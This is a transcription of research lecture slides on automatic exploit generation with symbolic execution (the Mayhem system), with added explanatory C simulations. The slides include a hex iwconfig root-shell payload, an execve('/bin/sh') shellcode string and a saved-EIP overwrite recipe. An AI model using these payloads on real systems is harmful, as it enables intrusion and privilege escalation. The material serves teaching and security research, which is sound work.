Checking the World’s Software for Exploitable Bugs

David Brumley, Carnegie Mellon University
dbrumley@cmu.edu
http://security.ece.cmu.edu/

An epic battle: Black vs. White [slide graphic labeled: format c:]

Exploit bugs [slide graphic labels: Bug, Black, White, format c:]

OK: $ iwconfig accesspoint
Exploit: $ iwconfig <payload>
# (superuser)
Payload: 01ad 0101 0101 0101 0101 0101 0101 0101 0101 0101 0101 0101 0101 0101 0101 0101 0101 0101 fce8 bfff 0101 0101 0101 0101 0101 0101 0101 0101 0101 0101 0101 0101 0101 0101 0101 3101 50c0 2f68 732f 6868 622f 6e69 e389 5350 e189 d231 0bb0 80cd

Bug Fixed! [slide graphic labels: Black, White, format c:]

Fact: Ubuntu Linux has over 99,000 known bugs

inp=`perl -e '{print "A"x8000}'`
for program in /usr/bin/*; do
    for opt in {a..z} {A..Z}; do
        timeout -s 9 1s $program -$opt $inp
    done
done
1009 Linux programs. 13 minutes. 52 new bugs in 29 programs.

Which bugs are exploitable? Evil David

Plaid Parliament of Pwning: CMU Hacking Team

DEF CON 2012 scoreboard [chart labels: CMU; x-axis: Time (3 days total)]

A Manual Process

DEF CON 2013

"I skate to where the puck is going to be, not where it has been."
Wayne Gretzky, Hockey Hall of Fame

Our Vision: Automatically Check the World’s Software for Exploitable Bugs

We owned the machine in seconds Evil David

Verification, but with a twist
Verification: Program + Correctness Property → Correct or Incorrect
The twist: Program + Un-exploitability Property → Safe paths or Exploit
33,248 programs. 152 new exploitable bugs.

Outline
• Basic exploitation
• Symbolic execution for exploit generation
• Automatic exploit generation on real code
• Experiments
• Related projects and the future

Control flow hijack: attacker gains control of execution
• buffer overflow
• format string attack
• heap metadata overwrite
• use-after-free
• ...
Same principle, different mechanism

Basic execution semantics of compiled code
• Process memory holds code, data, heap, and stack; the processor reads and writes it.
• The instruction pointer (EIP) points to the next instruction to execute.
• The processor repeats: fetch, decode, execute.
Control flow hijack: EIP = attacker code

Buffer overflows and the runtime stack
int vulnerable(char *input)
{
    char buf[32];   /* local variables */
    int x;
    if (...) {
        x = 1;
    } else {
        x = 0;
    }
    strcpy(buf, input);
    return x;
}
Control flow hijack when input length > buffer length
(execution semantics, including call/return)

Initial stack frame of vulnerable(): the locals (char buf[32]; int x;) are allocated on the stack, before strcpy(buf, input) runs. [stack diagram, lower addresses marked]

input = "ABC\0": strcpy(buf, input) writes ABC\0 into buf. Writes go up, from lower addresses toward higher ones.

The "return address": caller() calls vulnerable(input) at instruction i, and the address of instruction i+1 is stored on the stack as the saved EIP. The frame now holds ABC\0 in buf at the lower addresses and the saved EIP above it. On return, the processor loads the saved EIP back into EIP.

A buffer overflow occurs when data is written outside of the space allocated for the buffer.
• C does not check that writes are in bounds
Classic exploit: overwrite the saved EIP
Traditionally we show exploitability by running shellcode*
* More advanced methods, like Return-Oriented Programming, can also be automatically generated in our research

Shellcode is a string
execve("/bin/sh", 0, 0); compiles to the executable string:
\x31\xc9\xf7\xe1\x51\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\xb0\x0b\xcd\x80
Author: kernel_panik, http://www.shell-storm.org/shellcode/files/shellcode-752.php
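One property that makes this string usable as strcpy input can be checked directly: strcpy stops at the first NUL byte, so a payload containing one would be cut short. The sketch below stores the 21 bytes from the slide as inert data (nothing is executed) and checks them. The helper names is_nul_free and shellcode_len are hypothetical and not part of the talk.

```c
#include <assert.h>
#include <stddef.h>
#include <string.h>

/* The shellcode bytes from the slide, kept as plain data only.
   Nothing in this file executes them. */
static const char shellcode[] =
    "\x31\xc9\xf7\xe1\x51\x68\x2f\x2f"
    "\x73\x68\x68\x2f\x62\x69\x6e\x89"
    "\xe3\xb0\x0b\xcd\x80";

/* Hypothetical helper: returns 1 if the first n bytes contain no NUL. */
int is_nul_free(const char *bytes, size_t n)
{
    assert(bytes != NULL);
    return memchr(bytes, 0, n) == NULL;
}

/* Payload length, excluding the terminating NUL of the C literal. */
size_t shellcode_len(void)
{
    return sizeof shellcode - 1;
}
```

Here shellcode_len() is 21 and is_nul_free(shellcode, shellcode_len()) returns 1, so strcpy would copy the whole string.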

input = shellcode . address of buf
Payload: \x31\xc9\xf7\xe1\x51\x68\x2f\x2f\x73\x68\x68\x2f... followed by &buf
After strcpy(buf, input) in vulnerable(), buf holds the shellcode and the saved EIP holds &buf.

Owned! With input = shellcode . address of buf, vulnerable() returns to &buf, so %eip = <shellcode> (\x31\xc9\xf7\xe1\x51\x68\x2f\x2f\x73\x68\x68\x2f...), which runs execve("/bin/sh", NULL).
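The overwrite can be replayed safely in a simulation. The sketch below assumes a 32-bit frame laid out as buf[32], then x, then saved EBP, then saved EIP; real compilers may reorder or pad locals and insert stack canaries. The frame is modeled as a byte array so that nothing is actually corrupted. simulate_strcpy and the offset names are illustrative assumptions, not code from the talk.

```c
#include <assert.h>
#include <stddef.h>
#include <stdint.h>
#include <string.h>

/* Assumed frame layout for vulnerable(), lowest address first. */
enum { BUF_SIZE = 32, X_OFF = 32, SAVED_EBP_OFF = 36, SAVED_EIP_OFF = 40,
       FRAME_SIZE = 44, ARENA_SIZE = 256 };

/* Copies input the way strcpy would (all bytes up to and including the
   NUL) into a zeroed arena whose first FRAME_SIZE bytes model the frame.
   The arena is larger than the frame, so the simulation itself never
   writes out of bounds. Stores the saved-EIP slot, as it would be read
   at return, in *eip_out. Returns 1 if the copy ran past buf. */
int simulate_strcpy(const char *input, uint32_t original_eip,
                    uint32_t *eip_out)
{
    unsigned char arena[ARENA_SIZE] = {0};
    size_t n;

    assert(input != NULL && eip_out != NULL);
    n = strlen(input) + 1;
    assert(n <= ARENA_SIZE);

    memcpy(arena + SAVED_EIP_OFF, &original_eip, sizeof original_eip);
    memcpy(arena, input, n);   /* writes go toward higher addresses */
    memcpy(eip_out, arena + SAVED_EIP_OFF, sizeof *eip_out);
    return n > BUF_SIZE;
}
```

With the input "ABC" the saved EIP is unchanged. With 44 'A' characters the slot reads back as 0x41414141, which is the attacker-chosen value the slides replace with &buf.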

Automatically finding exploitable bugs

Verification, but with a twist
Verification: Program + Correctness Property → Correct or Incorrect
The twist: Program + Un-exploitability Property → Safe path or Exploitable
We use symbolic execution to test paths [Boyer75, Howden75, King76]

Basic symbolic execution
x = input()    (x can be anything)
if x > 42
    t: x > 42
    if x*x = MAXINT
        t: jmp stack[x]
        f: (x > 42) ∧ (x*x != MAXINT)
        if x < 42
            f: (x > 42) ∧ (x*x != MAXINT) ∧ !(x < 42)

Each annotation on the tree is a path formula: it is true exactly for the inputs that take that path. For example, (x > 42) ∧ (x*x != MAXINT) ∧ !(x < 42) describes the path through the t branch of if x > 42, the f branch of if x*x = MAXINT, and the f branch of if x < 42.

Basic symbolic execution: each feasible path yields a test case
Path formula: (x > 42) ∧ (x*x != MAXINT) ∧ !(x < 42)
A Satisfiability Modulo Theories (SMT) solver answers: satisfiable (x = 43). So x = 43 is a test case for this path.

Basic symbolic execution: infeasible paths
Path formula for the t branch of if x < 42: (x > 42) ∧ (x*x != MAXINT) ∧ (x < 42)
The SMT solver answers: UNSAT. The path is infeasible.
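As a toy illustration of these two solver queries, the sketch below replaces the SMT solver with an exhaustive search over a small range of x. That substitution is an assumption made for brevity: a real solver reasons about the whole domain instead of enumerating it. MAXINT is taken to be INT_MAX, and the names path_formula, find_model, and the two path functions are hypothetical.

```c
#include <assert.h>
#include <limits.h>
#include <stddef.h>

typedef int (*path_formula)(long long x);

/* Path formula for the f branch of "if x < 42". */
int path_not_less_than_42(long long x)
{
    return (x > 42) && (x * x != INT_MAX) && !(x < 42);
}

/* Path formula for the t branch of "if x < 42". */
int path_less_than_42(long long x)
{
    return (x > 42) && (x * x != INT_MAX) && (x < 42);
}

/* Stand-in for an SMT query: exhaustive search of [lo, hi].
   Returns 1 and stores a witness in *model if some x in the range
   satisfies f, otherwise returns 0. The range is capped so that
   x * x cannot overflow long long. */
int find_model(path_formula f, long long lo, long long hi, long long *model)
{
    long long x;

    assert(f != NULL && model != NULL && lo <= hi);
    assert(lo >= -1000000 && hi <= 1000000);
    for (x = lo; x <= hi; x++) {
        if (f(x)) {
            *model = x;
            return 1;
        }
    }
    return 0;
}
```

Searching [-1000, 1000], the first formula yields the witness 43, matching the slide. The second has no witness in that range, which mirrors the UNSAT answer but, unlike a solver, proves nothing outside the range searched.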

Checking non-exploitability
Un-exploitability property: EIP != user input
The path through the t branch of if x > 42 and the t branch of if x*x = MAXINT reaches jmp stack[x].
Query for that path: (x > 42) ∧ (x*x == MAXINT) ∧ Un-exploitable

Checking non-exploitability
For each path, ask the SMT solver: <path formula> ∧ eip != user input
SAT: safe. UNSAT: exploit.

Exploit generation can be cast as a verification problem.

Real world exploit generation: a brief history [timeline labels: Ours, Others]
And >150 papers on symbolic execution

Exploiting Real Code: The Mayhem Architecture
Principles:
• Require only the binary, e.g., BAP, our binary analysis platform
• Use intelligent analysis to reduce the state space, e.g., preconditioned symbolic execution
• Make queries to SMT as easy as possible, e.g., symbolic memories

Potentially infinite state space
strcpy(buf, input); behaves like:
while (input[i] != 0) {
    buf[i] = input[i];
    i++;
}
buf[i] = 0;
Symbolic execution forks at every test: if (input[0] != 0), if (input[1] != 0), …, if (input[n] != 0), each with a t and an f branch.

Check every branch blindly
• if (input[0] != 0), f branch: 20 min exploration
• if (input[1] != 0), f branch: 30 min exploration
• …
• if (input[n] != 0), f branch: x min exploration
Only then: exploitable bug found
KLEE [Cadar’08] does this

Preconditioned symbolic execution
Of all inputs, only some trigger a bug, and only some of those give a control hijack.
Preconditions focus the search, e.g.: input > len
Other examples in [Avgerinos11]

Static and online analysis determines likely exploit conditions
For char buf[32]; int x; ... strcpy(buf, input); the conditions are:
• 40 bytes
• All non-NULL

Example: length precondition
• if (input[0] != 0), f branch: precondition check length(input) > 40 ∧ input[0] == 0 is unsatisfiable. Not explored. Saved 20 min.
• if (input[1] != 0), f branch: precondition check length(input) > 40 ∧ input[1] == 0 is unsatisfiable. Not explored. Saved 30 min.
• …
• if (input[n] != 0), f branch: not explored. Saved x min.
Exploitable bug found
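The pruning effect of a length precondition can be counted in a small model. The sketch below assumes a simplified explorer in which the only forks are the input[i] tests of the strcpy loop, and in which a loop exit at index i is feasible only when i is greater than the precondition's minimum length. count_explored_exits is a hypothetical name, and the model ignores everything else a real executor such as Mayhem would track.

```c
#include <assert.h>

/* Counts the loop-exit paths explored for
       while (input[i] != 0) { buf[i] = input[i]; i++; }
   when the NUL can sit at any index from 0 to max_len. Each index i
   forks into "input[i] == 0" (the loop exits, so length(input) == i)
   and "input[i] != 0" (the loop continues). Under the precondition
   length(input) > min_len, an exit at i <= min_len contradicts the
   precondition and is pruned. Pass min_len = -1 for no precondition. */
int count_explored_exits(int max_len, int min_len)
{
    int i;
    int explored = 0;

    assert(max_len >= 0 && min_len >= -1 && min_len <= max_len);
    for (i = 0; i <= max_len; i++) {
        int exit_feasible = (i > min_len);
        if (exit_feasible) {
            explored++;
        }
    }
    return explored;
}
```

For inputs of up to 64 bytes, count_explored_exits(64, -1) gives 65 exit paths, while count_explored_exits(64, 40) gives 24: the 41 exits at indices 0 through 40 are never explored.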

Don’t treat the SMT solver as a black box! “Program” the SMT solver.
Query: (x > 42) ∧ (x*x != 0xffffffff) ∧ !(x < 42)
Answer: SAT (x = 43)

Symbolic memory indices
x := user_input();    (x can be anything)
<executed path>
y := mem[x];
assert(y = 42);
vulnerable();
Which memory cell contains 42? Memory runs from 0 to 2^32 - 1, so there are 2^32 cells to check.

Symbolic addresses occur often
c = get_char();
...
to_lower(c);

to_lower(char c){ return c >= -128 && c < 256 ? tbl[c] : c; }
The address of the table lookup (e.g., tbl + 'A') is symbolic.
Other causes
• Parsing: sscanf, vfprintf, etc.
• Character test: isspace, isalpha, etc.
• Conversion: toupper, tolower, mbtowc, etc.
• …

Concretization: test case generation
e.g., SAGE, DART, CUTE, KLEE
x := user_input();
<executed path>
y := mem[30];
assert(y = 42);
vulnerable();
Of the cells 0 to 2^32 - 1, only 1 cell (index 30) is checked.
Misses over 40% of exploits

Observation
The path formula constrains the range of symbolic memory accesses. At first x can be anything. After the t branches of x > 0 and x < 5, the formula 0 < x < 5 holds at y = mem[x]; assert(y == 42).
Use symbolic execution state to:
Step 1: Bound memory addresses referenced
Step 2: Reduce to linear formulas
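Step 1 can be illustrated with a bounded lookup. The sketch below assumes the path formula has already been reduced to an open interval lo < x < hi, and then examines only the cells in that interval instead of all 2^32. It does not attempt Step 2, the reduction to linear formulas. find_index_in_bounds and its parameters are hypothetical names.

```c
#include <assert.h>
#include <stddef.h>

/* Searches only the cells allowed by the path formula lo < x < hi for
   an index with mem[x] == wanted. Returns 1 and stores the index in
   *x_out, or returns 0 if no cell in the range matches.
   *cells_checked reports how many cells were examined. */
int find_index_in_bounds(const int *mem, size_t mem_len,
                         size_t lo, size_t hi, int wanted,
                         size_t *x_out, size_t *cells_checked)
{
    size_t x;

    assert(mem != NULL && x_out != NULL && cells_checked != NULL);
    assert(lo < hi && hi <= mem_len);
    *cells_checked = 0;
    for (x = lo + 1; x < hi; x++) {
        (*cells_checked)++;
        if (mem[x] == wanted) {
            *x_out = x;
            return 1;
        }
    }
    return 0;
}
```

With the bounds 0 < x < 5 from the slide, at most four cells are examined. Concretizing x to a single value would examine one cell and could miss the one that holds 42.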
